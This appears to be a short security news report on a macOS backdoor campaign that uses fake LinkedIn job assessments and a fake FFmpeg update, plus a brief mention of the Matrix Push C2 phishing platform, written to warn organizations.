A new backdoor campaign is targeting Mac users, tricking them into installing malicious software disguised as an FFmpeg update. This attack begins with fake job offers on LinkedIn.
Attackers pose as recruiters, luring victims to a specialized website for a “job assessment” and video introduction. The site then claims camera/microphone access is blocked, prompting a fake FFmpeg “update.”
To “fix” this, victims are instructed to run a `curl` command in their Terminal. This command downloads a script that installs a backdoor and a decoy application, according to Jamf. Read more on the FlexibleFerret malware here.
The decoy app displays a fake Chrome window requesting camera access, followed by a password prompt. Any credentials entered are sent directly to the attackers’ Dropbox account, compromising user data.
Organizations are urged to warn employees about unsolicited job assessments and Terminal-based instructions for “solving problems.” This is a crucial step to protect against such social engineering tactics.
The deceptive tactics used in the fake FFmpeg update campaign, leveraging social engineering to deploy backdoors, mirror a growing sophistication in cybercriminal methods designed to bypass security.
This trend is further exemplified by platforms like Matrix Push C2, which uses fileless, cross-platform phishing via browser notifications. Such methods establish persistent communication channels for attackers.
Both campaigns highlight an ongoing shift where threat actors seek to steal sensitive credentials and financial data, employing innovative approaches to circumvent traditional defenses and remain undetected.
For additional context on how new command-and-control platforms operate to facilitate fileless phishing and data theft, refer to this detailed analysis: Matrix Push C2 uses browser notifications for fileless, cross-platform phishing attacks.